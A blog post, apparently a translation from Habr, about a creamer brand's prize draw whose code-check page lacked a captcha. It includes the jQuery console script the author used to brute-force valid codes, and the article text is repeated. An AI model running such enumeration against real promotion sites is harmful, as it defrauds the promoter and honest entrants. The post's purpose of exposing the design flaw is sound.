Once again about how not to make prize draws
More recently, the scandals about the MTS and Nestea and Ebay and Biglion died down , and the developers still do not learn from the mistakes of others. This time, FRIMA distinguished us with their dry cream.
Tonight, I opened a pack of cream, and noticed there was a little round bucket with a code. In general, I usually do not participate in such events, but my opinion was attracted by a small trifle, namely: “the winning code” looked like this: FRIMA1234123. As many readers have noted, the code consists essentially of seven decimal digits, that is, we have a total of 10,000,000 combinations.
The first thing that occurred to me was to get on the site to enter the code - frima.biz/lottery , where it was found that no captcha was used to check the code. A quick inspection of a passing AJAX request for verification showed that a JSON object is received in response, in which there is a code field, which is 0 if the code exists.
')
Following this, I opened the browser console, and threw the following code:
After that we can at any time get the accumulated list of codes by making
It is easy to guess from the code that we simply check all possible codes starting from 1111111. Having received about a dozen codes in a minute, I have satisfied my ego and decided to write here.
As a result, I condemn the TopWebDesign company, which proudly subscribed to the footer of the reviewed site as the developer of this hack.
Tonight, I opened a pack of cream, and noticed there was a little round bucket with a code. In general, I usually do not participate in such events, but my opinion was attracted by a small trifle, namely: “the winning code” looked like this: FRIMA1234123. As many readers have noted, the code consists essentially of seven decimal digits, that is, we have a total of 10,000,000 combinations.
The first thing that occurred to me was to get on the site to enter the code - frima.biz/lottery , where it was found that no captcha was used to check the code. A quick inspection of a passing AJAX request for verification showed that a JSON object is received in response, in which there is a code field, which is 0 if the code exists.
')
Following this, I opened the browser console, and threw the following code:
t = []; i = 1111111; q = function() { jQuery.post('/lottery?task=ajax&action=checkTicketNumber', { spoof_id: 1, frmname: '', frmemail: '', 'extra_field[1]': '', 'extra_field[2]': '', ticket_number: 'FRIMA'+i }, function(res) { if(JSON.parse(res).code == 0) { t.push(i); }; if(i < 1112222) { // 10 000 000 i += 1; q(); } }); }; q(); After that we can at any time get the accumulated list of codes by making
console.log(t); It is easy to guess from the code that we simply check all possible codes starting from 1111111. Having received about a dozen codes in a minute, I have satisfied my ego and decided to write here.
As a result, I condemn the TopWebDesign company, which proudly subscribed to the footer of the reviewed site as the developer of this hack.
Source: https://habr.com/ru/post/212373/
All Articles